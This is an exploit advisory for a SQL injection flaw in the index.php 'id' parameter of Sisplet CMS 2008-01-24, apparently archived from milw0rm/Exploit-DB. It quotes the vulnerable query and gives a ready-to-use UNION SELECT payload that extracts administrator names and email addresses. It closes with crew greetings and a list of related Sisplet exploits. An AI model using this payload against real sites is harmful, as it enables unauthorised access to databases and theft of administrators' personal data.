================================================================= Sisplet CMS (index.php id) Remote SQL Injection Vulnerability ================================================================= ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 1 July 2008 SITE : cwh.citec.us ##################################################### APPLICATION : Sisplet CMS VERSION : 2008-01-24 VENDOR : http://cms.sisplet.org/ DOWNLOAD : http://downloads.sourceforge.net/sisplet/SiSplet-2008-01-24.zip ##################################################### --- Remote SQL Injection --- ** Magic Quote must turn off ** ----------------------------------- Vulnerable File (function.php) ----------------------------------- $sql = mysql_query("SELECT parent FROM menu WHERE id = '$id'"); --------- Exploit --------- [+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=[SQL Injection] ------ POC ------ [+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=15'/**/AND/**/1=2/**/UNION/**/SELECT/**/concat(ime,0x3a,priimek,0x3a,email),2,3,4/**/FROM/**/administratorji/**/WHERE/**/tip='0 ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## # milw0rm.com [2008-07-01]
Related Exploits
Trying to match CVEs (1): CVE-2008-3026Trying to match OSVDBs (1): 46878
Trying to match setup file: d0682c9ef9054a8ffd66c0bebee81578
Other Possible E-DB Search Terms: Sisplet CMS 2008-01-24, Sisplet CMS
Date | D | V | Title | Author |
---|---|---|---|---|
2007-04-05 |
![]() |
Sisplet CMS 05.10 - 'site_path' Remote File Inclusion | kezzap66345 | |
2009-12-07 |
![]() |
SiSplet CMS 2008-01-24 - Multiple Remote File Inclusions | cr4wl3r |